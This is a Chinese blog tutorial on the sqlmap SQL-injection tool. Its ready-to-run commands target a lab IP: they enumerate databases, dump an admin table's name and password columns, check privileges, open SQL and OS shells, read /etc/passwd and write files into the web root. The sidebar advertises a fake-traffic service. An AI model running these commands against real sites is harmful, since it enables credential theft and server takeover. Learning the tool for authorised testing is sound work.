Sqlmap使用教程(必备命令)

Sqlmap是一个专业的SQL注入工具,用法也很多,具体可以用"sqlmap -hh"查看完整的命令帮助文档,我这只是给大家分享一些最常用的Sqlmap用法:

 

一、Sqlmap注入篇

 

1、检查注入点

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11

 

2、爆所有数据库信息

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs

 

爆当前数据库信息

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db

 

3、列出指定数据库所有的表名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables

'fujieace' 为指定数据库名称

 

4、列出指定表名的所有列名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns

'admin' 为指定表名称

 

5、dump打印输出表名指定列名字段的值数据

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump

'name,password' 为指定字段名称

 

二、Sqlmap用户权限篇

 

1、列出数据库管理系统用户:

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users

 

查看当前连接数据库用户:

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user

 

2、判断当前用户是否是DBA?

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba

 

3、查看用户权限:

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace

 

三、Sqlmap文件操作与shell提权篇

 

1、sql shell

这里通过sqlmap可以直接获取一个sql shell,直接执行sql语句进行交互。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();

 

注意:这里由于进入了sql shell可以执行sql语句了,也可以用 load data infile、load_file、into outfile等函数来进行文件读取或写入;

 

2、cmd shell

这里通过sqlmap可以直接获取一个cmd shell,直接执行cmd命令进行交互。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig

 

3、读取服务器上指定文件

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt

 

4、写入本地文件到服务器上

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
付杰
wordpress站群服务 泛解析二级域名 二级目录
wordpress站群服务 泛解析二级域名 二级目录
  • ¥ 1999.9元
  • 市场价:8999元
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
  • ¥ 1.0元
  • 市场价:9.9元
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
  • ¥ 6.8元
  • 市场价:8.8元
PHP运行环境 wamp lamp lnmp 安装 配置 搭建
PHP运行环境 wamp lamp lnmp 安装 配置 搭建
  • ¥ 99.9元
  • 市场价:299元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: